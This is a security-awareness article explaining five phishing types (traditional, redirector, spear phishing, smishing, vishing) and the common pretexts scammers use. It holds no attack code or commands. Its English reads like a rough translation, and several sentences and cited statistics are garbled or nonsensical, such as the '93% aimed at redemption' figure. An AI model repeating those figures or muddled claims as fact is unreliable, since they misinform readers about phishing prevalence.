The 5 types of phishing you should be Beware of

How to recognize each type of threat?

It seems that every data breach and online attack is associated with a phishing attempt to steal credentials and passwords, run fraudulent transactions or trick someone into downloading malware. According to PhishMe statistics, in early 2016, 93% of phishing emails were aimed at redemption.

Businesses regularly remind users to beware of phishing attacks, but many users do not know how to recognize them. One of the reasons for this is the fact that these attacks can take various forms. “The Phishing attacks come in all shapes and sizes designed for specific individuals in organizations who have access to confidential data,” says Shalabh Mohan from security area 1.

Users are generally not well versed in fraud. According to Verizon's cybersecurity report, an attacker sending 10 phishing emails has a 90 percent chance that one person will lead. At first, this seems absurd, but reasonable if viewed in the context of users outside the core of technology, for example, in manufacturing and education.

Add to the fact that not all phishing scammers work the same way - some of them send emails to everyone while others carefully process the victim to target a particular type of person - and it is becoming more difficult to train users to recognize strange messages.

Some of the most used excuses to deceive the user are:

• Change in bank or service regulations.
• Incorrect closing of the user session.
• Improvements in security measures.
• Account lock for security reasons or change of access codes.
• Updating the conditions of use of the service.

The objectives of the scams are:

• Steal numbers from credit cards.
• Steal the PIN number.
• Steal passwords, accounts and profiles on social networks. 
• Impersonation in social networks.

Let's look at the different types of phishing attacks

The 5 Types of Phishing

In general, we can say that all the techniques we describe in this post are linked to Social Engineering. Typically, attackers go through a well-known company, social network, financial institution or some online sales site, to steal confidential information from victims.

This type of malicious campaign can be seen daily in Uk, the US and other Europea countries so today we will give you tips to identify 5 types of phishing that can be found.

1. Traditional Phishing

This type of attack is the simplest when it comes to analyzing it technically; is usually linked to the copy of a site known to the victim, in which the address where the entered data will be changed. In this way, the cybercriminal steals the credentials entered by the user, which can be hosted in a simple text of a file or sent to some email box.

The main feature of traditional phishing is to be connected to only one website that hosts all of the fake portal content.

In the below image, we can see a phishing site that affects Paypal. The page was mounted on the other, which would have allegedly been breached and then used to mount the fraud site.

2. Phishing Redirector

As in the previous case, this technique is used in massive campaigns, which despite the low percentage of victims, there are a lot of affected users and, consequently, compromised credentials.

This procedure has a level of complexity and, unlike the previous one, uses at least two or more sites or domains to continue the deception. Several known ways can be classified within this type of phishing.

However, we can highlight three techniques that are commonly detected by the ESET Research Laboratory and correspond to the use of URL shorteners, the injection of known Iframes and the exploitation of procedures related to the frames in the HTML code.

Although they are different concepts, they all have something in common: using an address to reflect a site stored in a given server through another, being visible only through a study of the source code.

In this way, cybercriminals try to extend the time spent by security teams to detect and eliminate the content of fake sites.

3. Spear Phishing

The main difference of this kind is to be at the few people or small groups. In this way, the campaigns are much more personalized and with a much higher percentage of victims.

It is not common to see cases that affect banking entities or social networks, since this type does not seek massiveness, on the contrary; in fact, this type of method is used in attacks like the APTs, directed to employees of companies with certain profiles. This means that victims can receive a personalized e-mail with their first and last names, including fake addresses known to generate greater trust and empathy for a careless navigator.

@Security Today

We must take into record that if the cybercriminals wanted to enter the systems, they would seek the weakest link in the network. Therefore, we should not expect that the Systems Manager is the main target of this type of attack, but that someone with less technical computer knowledge, as in many cases are people from non-IT areas (for example, administration or resources humans).

This methodology, together with Social Engineering, and a previous study of the victims, generates a solid technique with which one can easily compromise a corporate system or network with the objective of stealing credentials. For this reason, it is fundamental, but once again, the awareness and training of employees about good Information Security practices.

4. SMS Smishing

This type of phishing is related to the use of another digital channel such as mobile phones. Typically, cybercriminals go through known institutions and send a text message alerting the victim that they have won a prize. In general, victims respond with some type of code or unique number to validate their false award.

As usual, the purpose of this operation is to obtain an economic return, which is often related to scams in many ways. In Latin America campaigns were found that used messages of "congratulations" to inform the victims who were supposed to win a prize, for example. In these cases, personal data were requested or even false telephone service centers created, where in a very professional way they deceived the victims by asking for their bank account data and even credit card numbers.

In the below image, we can see a typical case of smishing,

Because this type of application does not require the sending of a message, it is only necessary to be connected to the Internet so that the threat spreads very quickly and economically to the attacker.

5. Vishing

As mentioned above, there is the establishment of false telephone attention centers that make connections with the purpose of committing fraud, relating them to cases of vishing.

This attack is often related to another, so that they complement each other to gain more credibility and thus deceive the victim in a simpler and more effective way.

To protect yourself from such threats and easily identify them, it is important to consider 6 tips for recognizing phishing emails. Also, maintaining an up-to-date security solution that can combat threats is critical.


By dividing this content and taking into account the tips above, you can protect yourself and your environment by taking advantage of technology safely and worry-free.